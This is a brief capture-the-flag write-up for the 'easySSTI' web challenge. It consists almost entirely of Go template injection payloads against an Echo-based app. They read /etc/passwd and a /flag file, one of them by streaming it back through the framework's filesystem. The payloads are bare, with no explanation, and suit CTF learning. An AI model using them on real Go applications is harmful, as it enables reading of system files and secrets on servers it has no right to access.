🏴‍☠️easySSTI ( Web Exploitation )

Can you SSTI me? ( Golang SSTI, WAF bypass )

{{.}}

{{.File "/etc/passwd"}}

{{.File "/flag"}}

{{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{ .Get "template" }}

{{ $x := .Echo.Filesystem.Open "/flag" }} {{ $x.Seek 1 0 }} {{ .Stream 200 "text/plain" $x }}

{{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{ .Get "template" }}

PreviousMerkle Hellman ( Cryptography )NextHardware is not so hard

Last updated